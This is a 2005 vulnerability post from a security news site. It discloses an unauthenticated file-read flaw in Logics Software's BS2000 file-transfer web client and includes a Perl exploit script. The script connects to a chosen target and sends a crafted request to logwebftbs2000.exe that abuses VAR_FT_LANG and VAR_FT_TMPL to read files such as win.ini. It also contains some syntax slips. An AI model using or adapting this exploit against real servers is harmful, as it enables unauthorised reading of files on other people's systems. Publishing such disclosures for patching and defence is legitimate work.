Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Logics Filetransfer Read Access Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-04-07 by basher13
Views: 555
| Current Rating: Not rated
|
| | Details |
|---|
Update:
7:54 AM 4/7/2005
Subject:
" Logics Filetransfer Read Access Exploit "
Description:
Logics Software Filetransfer from BS2000 Host to Web Client
Vulnerability:
Without authentication nor authorization it is possible to exploit
"File Transfer from BS2000 Host to Web Client" just replacing the
variables VAR_FT_*; VAR_FT_LANG manages the language that will be used
for templates and VAR_FT_TMPL manages the template to be used.
Replacing VAR_FT_LANG with "c:\" (whatever) and VAR_FT_TMPL with the
file we want to read (i.e: winnt/win.ini) we have read acces
to the resource requested (most files in the filesystem).
Exploit:
#!/usr/bin/perl
# Logics Filetransfer Read Access Exploit
# ---------------------------------------
#
# Greats: Pedro Viñuales,Román Ramírez (has discovered bug)
# Info: 98.to/infamous
if((!defined($ARGV[0]))||(!defined($ARGV[1])))
{
print "\nLogics Filetransfer Read Access Exploit\n\n";
print "------------------------------------------\n";
print "\n INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: logicfl.pl [target_host] [path] \n";
print "[!]Exam: logicfl.pl www.target.com logwebcgi\n\n";
exit 0;
}
print "\n[+]Connecting to $ARGV[0]..\n\n";
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
unless ($SOCKET)
{
die "[-]$ARGV[0] connection [FAILED]\n"
}
print "[+]Target Connected";
$win = winnt/win.ini;
print $SOCKET "GET /$ARGV[1]/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=$win\n";
print "[+]Sent evil request..\n";
while(<$SOCKET>) {
push @DATA, $_;
}
my $woot = join(' ',@DATA);
if($woot =~/$win wasn't found/)
{
print "[-]$win not found.\n";
exit 0;
}
else
{
print "[+]Print result..";
print "@DATA";
}
Solution:
Contacted but no response received.
Check the way to lock the access to c:\ (/) resource from within this
tool, but our recommendation is to directly remove access to the bs2000
ftp executables and tools (everything inside logwebcgi/ directory).
Vendor URL:
http://www.logics.de
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1458
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
